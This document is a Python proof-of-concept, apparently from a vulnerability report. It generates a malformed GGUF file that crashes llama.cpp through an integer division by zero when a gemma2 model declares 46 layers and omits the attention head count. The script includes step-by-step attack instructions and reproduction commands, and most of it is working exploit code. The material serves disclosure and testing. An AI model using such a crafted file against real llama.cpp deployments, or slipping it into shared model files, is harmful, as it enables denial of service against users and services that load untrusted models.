| |
| """ |
| PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading. |
| |
| Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes: |
| |
| hparams.f_attention_scale = type == LLM_TYPE_27B |
| ? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0))) |
| : 1.0f / std::sqrt(float(hparams.n_embd_head_k)); |
| |
| When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken. |
| If the `attention.head_count` key is omitted from the GGUF file, the n_head_arr |
| stays filled with 0s (from std::fill at line 552), so n_head(0) returns 0. |
| This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero. |
| |
| The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the |
| n_embd_head_k calculation, not the architecture-specific code at line 1347. |
| |
| Platform behavior: |
| - x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136 |
| - ARM64: Silent undefined behavior (ARM SDIV returns 0 for div-by-zero), |
| but UBSan catches it and aborts with exit code 134 |
| |
| Attack vector: |
| 1. Set general.architecture = "gemma2" |
| 2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B) |
| 3. Set gemma2.embedding_length = 4096 (any non-zero value) |
| 4. Set gemma2.context_length = 8192 (required) |
| 5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2) |
| 6. OMIT gemma2.attention.head_count (this is loaded with required=false) |
| 7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero |
| |
| The crash occurs during load_hparams(), before vocab or tensor loading, |
| so no valid vocabulary or tensor data is needed. |
| |
| Confirmed UBSan output: |
| src/llama-model.cpp:1347:61: runtime error: division by zero |
| SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61 |
| """ |
|
|
| import struct |
| import os |
|
|
| |
| GGUF_MAGIC = b"GGUF" |
| GGUF_VERSION = 3 |
| GGUF_DEFAULT_ALIGNMENT = 32 |
|
|
| |
| GGUF_TYPE_UINT32 = 4 |
| GGUF_TYPE_FLOAT32 = 6 |
| GGUF_TYPE_STRING = 8 |
|
|
|
|
| def write_string(f, s): |
| """Write a GGUF string: uint64 length + chars (no null terminator).""" |
| encoded = s.encode('utf-8') |
| f.write(struct.pack('<Q', len(encoded))) |
| f.write(encoded) |
|
|
|
|
| def write_kv_string(f, key, value): |
| """Write a KV pair with string value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_STRING)) |
| write_string(f, value) |
|
|
|
|
| def write_kv_uint32(f, key, value): |
| """Write a KV pair with uint32 value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_UINT32)) |
| f.write(struct.pack('<I', value)) |
|
|
|
|
| def write_kv_float32(f, key, value): |
| """Write a KV pair with float32 value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_FLOAT32)) |
| f.write(struct.pack('<f', value)) |
|
|
|
|
| def create_gemma2_divzero_gguf(output_path): |
| """Create a GGUF file that triggers integer division-by-zero in gemma2 hparams loading. |
| |
| The crash occurs in load_hparams() at the LLM_ARCH_GEMMA2 case, before |
| vocab or tensor loading. So we need: |
| - A valid GGUF v3 header |
| - The required KV pairs for gemma2 (but NOT attention.head_count) |
| - Zero tensors (the crash happens before tensors are loaded) |
| """ |
|
|
| n_tensors = 0 |
| n_kv = 5 |
|
|
| with open(output_path, 'wb') as f: |
| |
| f.write(GGUF_MAGIC) |
| f.write(struct.pack('<I', GGUF_VERSION)) |
| f.write(struct.pack('<Q', n_tensors)) |
| f.write(struct.pack('<Q', n_kv)) |
|
|
| |
|
|
| |
| |
| write_kv_string(f, "general.architecture", "gemma2") |
|
|
| |
| |
| write_kv_uint32(f, "gemma2.context_length", 8192) |
|
|
| |
| |
| |
| write_kv_uint32(f, "gemma2.embedding_length", 4096) |
|
|
| |
| |
| |
| |
| write_kv_uint32(f, "gemma2.block_count", 46) |
|
|
| |
| |
| |
| write_kv_float32(f, "gemma2.attention.layer_norm_rms_epsilon", 1e-6) |
|
|
| |
| |
| |
| |
| |
|
|
| |
| |
| current_pos = f.tell() |
| aligned_pos = (current_pos + GGUF_DEFAULT_ALIGNMENT - 1) // GGUF_DEFAULT_ALIGNMENT * GGUF_DEFAULT_ALIGNMENT |
| if aligned_pos > current_pos: |
| f.write(b'\x00' * (aligned_pos - current_pos)) |
|
|
| file_size = os.path.getsize(output_path) |
| print(f"[*] Created: {output_path}") |
| print(f"[*] File size: {file_size} bytes") |
| print(f"[*]") |
| print(f"[*] Vulnerability details:") |
| print(f"[*] Architecture: gemma2 (LLM_ARCH_GEMMA2)") |
| print(f"[*] block_count: 46 (triggers LLM_TYPE_27B)") |
| print(f"[*] embedding_length: 4096") |
| print(f"[*] head_count: OMITTED (stays 0 from std::fill)") |
| print(f"[*]") |
| print(f"[*] Crash location: src/llama-model.cpp:1347") |
| print(f"[*] hparams.n_embd / hparams.n_head(0)") |
| print(f"[*] = 4096 / 0") |
| print(f"[*] => integer division by zero (UB)") |
| print(f"[*]") |
| print(f"[*] Test with (x86_64 -- deterministic SIGFPE crash):") |
| print(f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'") |
| print(f"[*] Expected: SIGFPE, exit code 136") |
| print(f"[*]") |
| print(f"[*] Test with UBSan (any platform -- clean UB report):") |
| print(f"[*] cmake -B build-ubsan \\") |
| print(f"[*] -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\") |
| print(f"[*] -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\") |
| print(f"[*] -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\") |
| print(f"[*] -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\") |
| print(f"[*] -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF") |
| print(f"[*] cmake --build build-ubsan -j$(nproc)") |
| print(f"[*] ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'") |
| print(f"[*] Expected: 'runtime error: division by zero', exit code 134") |
|
|
|
|
| if __name__ == "__main__": |
| output_dir = "/Users/eltarne/Documents/script/gguf_poc" |
| os.makedirs(output_dir, exist_ok=True) |
|
|
| output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf") |
| create_gemma2_divzero_gguf(output_path) |
|
|